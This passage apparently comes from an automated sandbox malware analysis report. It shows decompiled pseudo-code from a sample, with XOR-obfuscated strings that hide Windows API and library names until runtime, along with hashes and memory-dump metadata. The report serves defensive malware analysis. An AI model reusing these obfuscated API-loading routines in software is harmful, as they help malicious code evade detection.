                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				void* _t26;
                                                                    				void* _t28;
                                                                    				char* _t39;
                                                                    
                                                                    				if( *0x447f98 == 0) {
                                                                    					_v17 = 0x5a;
                                                                    					_v14 = 0x5a;
                                                                    					_v10 = 0x5a;
                                                                    					 *_t39 = 0x76;
                                                                    					_v19 = 0x51;
                                                                    					_v18 = 0x4b;
                                                                    					_v16 = 0x4d;
                                                                    					_v15 = 0x51;
                                                                    					_v13 = 0x4b;
                                                                    					_v12 = 0x70;
                                                                    					_v11 = 0x4f;
                                                                    					_v9 = 0x51;
                                                                    					_v8 = 0x6a;
                                                                    					_v7 = 0x4d;
                                                                    					_v6 = 0x53;
                                                                    					_v5 = 0x7e;
                                                                    					_v4 = 0x3f;
                                                                    					_t28 = 0;
                                                                    					do {
                                                                    						 *(_t39 + _t28) =  *(_t39 + _t28) ^ 0x0000003f;
                                                                    						_t28 = _t28 + 1;
                                                                    					} while (_t28 < 0x11);
                                                                    					 *0x447f98 = E0041D440(_t39);
                                                                    				}
                                                                    				_t26 = InternetOpenUrlA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t26;
                                                                    			}






















                                                                    0x0041d68a
                                                                    0x0041d692
                                                                    0x0041d696
                                                                    0x0041d69a
                                                                    0x0041d69e
                                                                    0x0041d6a2
                                                                    0x0041d6a6
                                                                    0x0041d6ab
                                                                    0x0041d6af
                                                                    0x0041d6b3
                                                                    0x0041d6b8
                                                                    0x0041d6bd
                                                                    0x0041d6c2
                                                                    0x0041d6c6
                                                                    0x0041d6cb
                                                                    0x0041d6cf
                                                                    0x0041d6d4
                                                                    0x0041d6d9
                                                                    0x0041d6de
                                                                    0x0041d6e0
                                                                    0x0041d6e0
                                                                    0x0041d6e4
                                                                    0x0041d6e5
                                                                    0x0041d6f6
                                                                    0x0041d6f6
                                                                    0x0041d719
                                                                    0x0041d71e

                                                                    APIs
                                                                    • InternetOpenUrlA.WININET(?,?,?,?,?,?), ref: 0041D719
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: ?$K$K$O$S$j$p$~
                                                                    • API String ID: 2038078732-1979315166
                                                                    • Opcode ID: f0ceb38a12387fa7ebb3492018f8884d937f57317b6df8823adc221cfaf151fa
                                                                    • Instruction ID: 8d3540ec489888079d58789b4d96eeb6edfa7ae9ddedbedf3bbbbc69ba9fea04
                                                                    • Opcode Fuzzy Hash: f0ceb38a12387fa7ebb3492018f8884d937f57317b6df8823adc221cfaf151fa
                                                                    • Instruction Fuzzy Hash: 7C1137A150D3C0AED302D768948468BBFD55BEA248F08C99CE0DD87253D279D649CB27
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 222 41b770-41b77a 223 41b7fb-41b805 GetFileAttributesA 222->223 224 41b77c-41b7d9 222->224 225 41b7e0-41b7e8 224->225 225->225 226 41b7ea-41b7f6 call 41a600 225->226 226->223
                                                                    C-Code - Quality: 100%
                                                                    			E0041B770(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				long _t23;
                                                                    				void* _t25;
                                                                    				char* _t31;
                                                                    
                                                                    				if( *0x447e7c == 0) {
                                                                    					_v18 = 0x2b;
                                                                    					_v12 = 0x2b;
                                                                    					_v11 = 0x2b;
                                                                    					_v6 = 0x2b;
                                                                    					 *_t31 = 0x18;
                                                                    					_v19 = 0x3a;
                                                                    					_v17 = 0x19;
                                                                    					_v16 = 0x36;
                                                                    					_v15 = 0x33;
                                                                    					_v14 = 0x3a;
                                                                    					_v13 = 0x1e;
                                                                    					_v10 = 0x2d;
                                                                    					_v9 = 0x36;
                                                                    					_v8 = 0x3d;
                                                                    					_v7 = 0x2a;
                                                                    					_v5 = 0x3a;
                                                                    					_v4 = 0x2c;
                                                                    					_v3 = 0x1e;
                                                                    					_v2 = 0x5f;
                                                                    					_t25 = 0;
                                                                    					do {
                                                                    						 *(_t31 + _t25) =  *(_t31 + _t25) ^ 0x0000005f;
                                                                    						_t25 = _t25 + 1;
                                                                    					} while (_t25 < 0x13);
                                                                    					 *0x447e7c = E0041A600(_t31);
                                                                    				}
                                                                    				_t23 = GetFileAttributesA(_a4); // executed
                                                                    				return _t23;
                                                                    			}
























                                                                    0x0041b77a
                                                                    0x0041b782
                                                                    0x0041b786
                                                                    0x0041b78a
                                                                    0x0041b78e
                                                                    0x0041b792
                                                                    0x0041b796
                                                                    0x0041b79a
                                                                    0x0041b79f
                                                                    0x0041b7a4
                                                                    0x0041b7a9
                                                                    0x0041b7ad
                                                                    0x0041b7b1
                                                                    0x0041b7b6
                                                                    0x0041b7bb
                                                                    0x0041b7c0
                                                                    0x0041b7c5
                                                                    0x0041b7c9
                                                                    0x0041b7ce
                                                                    0x0041b7d2
                                                                    0x0041b7d7
                                                                    0x0041b7e0
                                                                    0x0041b7e0
                                                                    0x0041b7e4
                                                                    0x0041b7e5
                                                                    0x0041b7f6
                                                                    0x0041b7f6
                                                                    0x0041b800
                                                                    0x0041b805

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(?,?,?,?,00420E29,?), ref: 0041B800
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID: *$,$-$3$6$6$=$_
                                                                    • API String ID: 3188754299-3475779043
                                                                    • Opcode ID: 0d3b9fa52362d891adbcd05ee923c714007aa55324aa87aa1493945076161f20
                                                                    • Instruction ID: 99f95d635064569582312d5ed0632cc80204f6211313241e0c15fd45b853084a
                                                                    • Opcode Fuzzy Hash: 0d3b9fa52362d891adbcd05ee923c714007aa55324aa87aa1493945076161f20
                                                                    • Instruction Fuzzy Hash: 1B11B36100D3C1ADD312DB79944868BBFD45BB6248F48C89EE0D887243D6B9865DC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 229 41b5b0-41b5ba 230 41b622-41b631 Process32First 229->230 231 41b5bc-41b605 229->231 232 41b607-41b60f 231->232 232->232 233 41b611-41b61d call 41a600 232->233 233->230
                                                                    C-Code - Quality: 100%
                                                                    			E0041B5B0(void* _a4, struct tagPROCESSENTRY32W _a8) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				int _t20;
                                                                    				void* _t22;
                                                                    				char* _t28;
                                                                    
                                                                    				if( *0x447e68 == 0) {
                                                                    					_v11 = 0x76;
                                                                    					_v10 = 0x76;
                                                                    					_v4 = 0x76;
                                                                    					 *_t28 = 0x55;
                                                                    					_v15 = 0x77;
                                                                    					_v14 = 0x6a;
                                                                    					_v13 = 0x66;
                                                                    					_v12 = 0x60;
                                                                    					_v9 = 0x36;
                                                                    					_v8 = 0x37;
                                                                    					_v7 = 0x43;
                                                                    					_v6 = 0x6c;
                                                                    					_v5 = 0x77;
                                                                    					_v3 = 0x71;
                                                                    					_v2 = 5;
                                                                    					_t22 = 0;
                                                                    					do {
                                                                    						 *(_t28 + _t22) =  *(_t28 + _t22) ^ 0x00000005;
                                                                    						_t22 = _t22 + 1;
                                                                    					} while (_t22 < 0xf);
                                                                    					 *0x447e68 = E0041A600(_t28);
                                                                    				}
                                                                    				_t20 = Process32First(_a4, _a8); // executed
                                                                    				return _t20;
                                                                    			}




















                                                                    0x0041b5ba
                                                                    0x0041b5c0
                                                                    0x0041b5c4
                                                                    0x0041b5c8
                                                                    0x0041b5cc
                                                                    0x0041b5d0
                                                                    0x0041b5d4
                                                                    0x0041b5d9
                                                                    0x0041b5de
                                                                    0x0041b5e3
                                                                    0x0041b5e8
                                                                    0x0041b5ed
                                                                    0x0041b5f2
                                                                    0x0041b5f7
                                                                    0x0041b5fb
                                                                    0x0041b600
                                                                    0x0041b605
                                                                    0x0041b607
                                                                    0x0041b607
                                                                    0x0041b60b
                                                                    0x0041b60c
                                                                    0x0041b61d
                                                                    0x0041b61d
                                                                    0x0041b62c
                                                                    0x0041b631

                                                                    APIs
                                                                    • Process32First.KERNEL32(?,?,00000000,?,00000002,00000000,?,00000000,?,00000104,00000000,00000530), ref: 0041B62C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FirstProcess32
                                                                    • String ID: 6$7$C$`$f$j$l$q
                                                                    • API String ID: 2623510744-3147186313
                                                                    • Opcode ID: ec3e15e1accf2829bc3234cd5c769d57a244792552f554329bd279219b98bce6
                                                                    • Instruction ID: b08c48f58d53b322ae976454ad898071e10c467081480ee311279ed6d051d735
                                                                    • Opcode Fuzzy Hash: ec3e15e1accf2829bc3234cd5c769d57a244792552f554329bd279219b98bce6
                                                                    • Instruction Fuzzy Hash: B301056140C3C0AEE302DB68944875BBFD55BA2208F58CC9DE0D88B252D2BA8559C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C870(void* _a4) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				long _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t22;
                                                                    
                                                                    				if( *0x447f08 == 0) {
                                                                    					_v11 = 0x44;
                                                                    					_v5 = 0x44;
                                                                    					_v3 = 0x44;
                                                                    					 *_t22 = 0x73;
                                                                    					_v10 = 0x46;
                                                                    					_v9 = 0x62;
                                                                    					_v8 = 0x4d;
                                                                    					_v7 = 0x4e;
                                                                    					_v6 = 0x52;
                                                                    					_v4 = 0x6a;
                                                                    					_v2 = 0x58;
                                                                    					_v1 = 0x21;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t22 + _t18) =  *(_t22 + _t18) ^ 0x00000021;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xc);
                                                                    					 *0x447f08 = E0041C580(_t22);
                                                                    				}
                                                                    				_t16 = RegCloseKey(_a4); // executed
                                                                    				return _t16;
                                                                    			}

















                                                                    0x0041c87a
                                                                    0x0041c87e
                                                                    0x0041c882
                                                                    0x0041c886
                                                                    0x0041c88a
                                                                    0x0041c88e
                                                                    0x0041c893
                                                                    0x0041c898
                                                                    0x0041c89d
                                                                    0x0041c8a2
                                                                    0x0041c8a7
                                                                    0x0041c8ac
                                                                    0x0041c8b1
                                                                    0x0041c8b6
                                                                    0x0041c8b8
                                                                    0x0041c8b8
                                                                    0x0041c8bc
                                                                    0x0041c8bd
                                                                    0x0041c8ce
                                                                    0x0041c8ce
                                                                    0x0041c8d8
                                                                    0x0041c8dd

                                                                    APIs
                                                                    • RegCloseKey.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041C8D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: !$F$M$N$R$X$b$j
                                                                    • API String ID: 3535843008-484739499
                                                                    • Opcode ID: 048b44ccf2b4ab54179ecfd4d628e1ffeb9cc40b5f70999f90622b4e7db9226c
                                                                    • Instruction ID: 0313bf024ebe32c4073a4bd58ffb1faca4236f67feddb16742faa3dfbfce2811
                                                                    • Opcode Fuzzy Hash: 048b44ccf2b4ab54179ecfd4d628e1ffeb9cc40b5f70999f90622b4e7db9226c
                                                                    • Instruction Fuzzy Hash: 9A01AC6154C3C0ADE302E778984475BBFD55BA2208F08C86DE5D886243D2BAC55DC727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041DA50(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				signed int _v16;
                                                                    				struct HINSTANCE__* _t23;
                                                                    				intOrPtr _t26;
                                                                    				void* _t30;
                                                                    				signed int _t34;
                                                                    				intOrPtr _t35;
                                                                    				signed int _t36;
                                                                    				signed int _t37;
                                                                    				signed short _t38;
                                                                    				_Unknown_base(*)()* _t39;
                                                                    				void* _t40;
                                                                    				signed int* _t42;
                                                                    
                                                                    				_t42 =  &_v16;
                                                                    				_t37 = _v16;
                                                                    				if(_t37 >= 0x76) {
                                                                    					_t38 = _t37 & 0x00000021;
                                                                    				} else {
                                                                    					_t38 = _t37 + _t37 * 8 << 3;
                                                                    				}
                                                                    				_t23 =  *0x447fb0; // 0x77450000
                                                                    				if(_t23 != 0) {
                                                                    					L11:
                                                                    					_t39 = GetProcAddress(_t23, _a4);
                                                                    					if(_t39 == 0) {
                                                                    						_t26 =  *0x447d7c; // 0x1
                                                                    						if(_t26 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t39;
                                                                    				} else {
                                                                    					_v10 = 0x6f;
                                                                    					_v7 = 0x6f;
                                                                    					_v4 = 0x31;
                                                                    					_v3 = 0x31;
                                                                    					_v12 = 0x2a;
                                                                    					_v11 = 0x2e;
                                                                    					_v9 = 2;
                                                                    					_v8 = 0x6e;
                                                                    					_v6 = 0x73;
                                                                    					_v5 = 0x39;
                                                                    					_v2 = 0x5d;
                                                                    					_t30 = 0;
                                                                    					do {
                                                                    						 *(_t42 + _t30 + 8) =  *(_t42 + _t30 + 8) ^ 0x0000005d;
                                                                    						_t30 = _t30 + 1;
                                                                    					} while (_t30 < 0xb);
                                                                    					_t23 = LoadLibraryA( &_v12); // executed
                                                                    					 *0x447fb0 = _t23;
                                                                    					if(_t23 != 0) {
                                                                    						goto L11;
                                                                    					}
                                                                    					_t36 = _t38 & 0x0000ffff;
                                                                    					_t34 = _t36;
                                                                    					_t40 = 0x58;
                                                                    					do {
                                                                    						_t40 = _t40 - 1;
                                                                    						_t34 = _t34 + _t36 - 0x2f;
                                                                    					} while (_t40 != 0);
                                                                    					_t35 =  *0x447d7c; // 0x1
                                                                    					if(_t35 != 0) {
                                                                    						E0041A720(1);
                                                                    						_t23 =  *0x447fb0; // 0x77450000
                                                                    					}
                                                                    					goto L11;
                                                                    				}
                                                                    			}


























                                                                    0x0041da50
                                                                    0x0041da54
                                                                    0x0041da5c
                                                                    0x0041da66
                                                                    0x0041da5e
                                                                    0x0041da61
                                                                    0x0041da61
                                                                    0x0041da69
                                                                    0x0041da70
                                                                    0x0041dafd
                                                                    0x0041db09
                                                                    0x0041db0d
                                                                    0x0041db0f
                                                                    0x0041db16
                                                                    0x0041db1a
                                                                    0x0041db1a
                                                                    0x0041db16
                                                                    0x0041db25
                                                                    0x0041da76
                                                                    0x0041da78
                                                                    0x0041da7c
                                                                    0x0041da82
                                                                    0x0041da86
                                                                    0x0041da8a
                                                                    0x0041da8f
                                                                    0x0041da94
                                                                    0x0041da99
                                                                    0x0041da9e
                                                                    0x0041daa3
                                                                    0x0041daa8
                                                                    0x0041daad
                                                                    0x0041dab0
                                                                    0x0041dab0
                                                                    0x0041dab5
                                                                    0x0041dab6
                                                                    0x0041dac0
                                                                    0x0041dac8
                                                                    0x0041dacd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041dacf
                                                                    0x0041dad2
                                                                    0x0041dad4
                                                                    0x0041dae0
                                                                    0x0041dae0
                                                                    0x0041dae1
                                                                    0x0041dae1
                                                                    0x0041dae7
                                                                    0x0041daef
                                                                    0x0041daf3
                                                                    0x0041daf8
                                                                    0x0041daf8
                                                                    0x00000000
                                                                    0x0041daef

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(0000005D), ref: 0041DAC0
                                                                    • GetProcAddress.KERNEL32(77450000,?), ref: 0041DB03
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: .$9$]$]$n$s
                                                                    • API String ID: 2574300362-1295284220
                                                                    • Opcode ID: f9ceeb0a3f171ee359b9fda0626b57e1d140181f4c68cf74b47754b46062da32
                                                                    • Instruction ID: f63ae0a42ef01c4788117a8a6e3e38cce6ab980ebf4f5bce606425f6337d4827
                                                                    • Opcode Fuzzy Hash: f9ceeb0a3f171ee359b9fda0626b57e1d140181f4c68cf74b47754b46062da32
                                                                    • Instruction Fuzzy Hash: 29213775A0C3908ED711DB28D80439FBBE56F62384F04885EE8D987342C378D949C7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041E6C0(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				void* _v16;
                                                                    				struct HINSTANCE__* _t21;
                                                                    				intOrPtr _t24;
                                                                    				void* _t27;
                                                                    				intOrPtr _t36;
                                                                    				_Unknown_base(*)()* _t39;
                                                                    				void* _t41;
                                                                    
                                                                    				_t41 =  &_v16;
                                                                    				_t21 =  *0x447d80; // 0x775c0000
                                                                    				if(_t21 != 0) {
                                                                    					L6:
                                                                    					_t39 = GetProcAddress(_t21, _a4);
                                                                    					if(_t39 == 0) {
                                                                    						_t24 =  *0x447d7c; // 0x1
                                                                    						if(_t24 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t39;
                                                                    				} else {
                                                                    					_v4 = 0x4f;
                                                                    					_v3 = 0x4f;
                                                                    					_v12 = 0x56;
                                                                    					_v11 = 0x50;
                                                                    					_v10 = 0x46;
                                                                    					_v9 = 0x51;
                                                                    					_v8 = 0x10;
                                                                    					_v7 = 0x11;
                                                                    					_v6 = 0xd;
                                                                    					_v5 = 0x47;
                                                                    					_v2 = 0x23;
                                                                    					_t27 = 0;
                                                                    					goto L2;
                                                                    					L2:
                                                                    					 *(_t41 + _t27 + 4) =  *(_t41 + _t27 + 4) ^ 0x00000023;
                                                                    					_t27 = _t27 + 1;
                                                                    					if(_t27 < 0xb) {
                                                                    						goto L2;
                                                                    					} else {
                                                                    						_t21 = LoadLibraryA( &_v12); // executed
                                                                    						 *0x447d80 = _t21;
                                                                    						if(_t21 == 0) {
                                                                    							_t36 =  *0x447d7c; // 0x1
                                                                    							if(_t36 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t21 =  *0x447d80; // 0x775c0000
                                                                    							}
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}





















                                                                    0x0041e6cc
                                                                    0x0041e6dc
                                                                    0x0041e6e3
                                                                    0x0041e755
                                                                    0x0041e762
                                                                    0x0041e766
                                                                    0x0041e768
                                                                    0x0041e76f
                                                                    0x0041e773
                                                                    0x0041e773
                                                                    0x0041e76f
                                                                    0x0041e77e
                                                                    0x0041e6e5
                                                                    0x0041e6e7
                                                                    0x0041e6eb
                                                                    0x0041e6ef
                                                                    0x0041e6f4
                                                                    0x0041e6f9
                                                                    0x0041e6fe
                                                                    0x0041e703
                                                                    0x0041e708
                                                                    0x0041e70d
                                                                    0x0041e712
                                                                    0x0041e717
                                                                    0x0041e71c
                                                                    0x0041e71c
                                                                    0x0041e720
                                                                    0x0041e720
                                                                    0x0041e725
                                                                    0x0041e729
                                                                    0x00000000
                                                                    0x0041e72b
                                                                    0x0041e730
                                                                    0x0041e738
                                                                    0x0041e73d
                                                                    0x0041e73f
                                                                    0x0041e747
                                                                    0x0041e74b
                                                                    0x0041e750
                                                                    0x0041e750
                                                                    0x0041e747
                                                                    0x00000000
                                                                    0x0041e73d
                                                                    0x0041e729

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(00000023), ref: 0041E730
                                                                    • GetProcAddress.KERNEL32(775C0000,?), ref: 0041E75C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: #$#$F$G$P$Q
                                                                    • API String ID: 2574300362-189938813
                                                                    • Opcode ID: 5e7becb68d88655aeacccd6c82e3a150e8ab45c56a3a61cf64c262db6ff26e82
                                                                    • Instruction ID: be822463ee9e1b72bf6663f729873995654200478fad9ce6b249bfcabaea4946
                                                                    • Opcode Fuzzy Hash: 5e7becb68d88655aeacccd6c82e3a150e8ab45c56a3a61cf64c262db6ff26e82
                                                                    • Instruction Fuzzy Hash: E4216F7860C3805AE3059B39D8587ABBFD55F51744F04885DE4A8CB382E779C844876B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041CD20(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				int _t28;
                                                                    				void* _t31;
                                                                    				CHAR* _t41;
                                                                    
                                                                    				if( *0x447f30 == 0) {
                                                                    					_v19 = 0x68;
                                                                    					_v14 = 0x68;
                                                                    					_v13 = 0x63;
                                                                    					_v11 = 0x63;
                                                                    					_v2 = 0x63;
                                                                    					 *_t41 = 0x4a;
                                                                    					_v18 = 0x79;
                                                                    					_v17 = 0x59;
                                                                    					_v16 = 0x62;
                                                                    					_v15 = 0x66;
                                                                    					_v12 = 0x44;
                                                                    					_v10 = 0x6b;
                                                                    					_v9 = 0x62;
                                                                    					_v8 = 0x7f;
                                                                    					_v7 = 0x60;
                                                                    					_v6 = 0x6c;
                                                                    					_v5 = 0x79;
                                                                    					_v4 = 0x64;
                                                                    					_v3 = 0x62;
                                                                    					_v1 = 0xd;
                                                                    					_t31 = 0;
                                                                    					do {
                                                                    						 *(_t41 + _t31) =  *(_t41 + _t31) ^ 0x0000000d;
                                                                    						_t31 = _t31 + 1;
                                                                    					} while (_t31 < 0x14);
                                                                    					 *0x447f30 = E0041C580(_t41);
                                                                    				}
                                                                    				_t28 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t28;
                                                                    			}

























                                                                    0x0041cd2a
                                                                    0x0041cd2e
                                                                    0x0041cd32
                                                                    0x0041cd3c
                                                                    0x0041cd40
                                                                    0x0041cd44
                                                                    0x0041cd48
                                                                    0x0041cd4c
                                                                    0x0041cd50
                                                                    0x0041cd55
                                                                    0x0041cd59
                                                                    0x0041cd5e
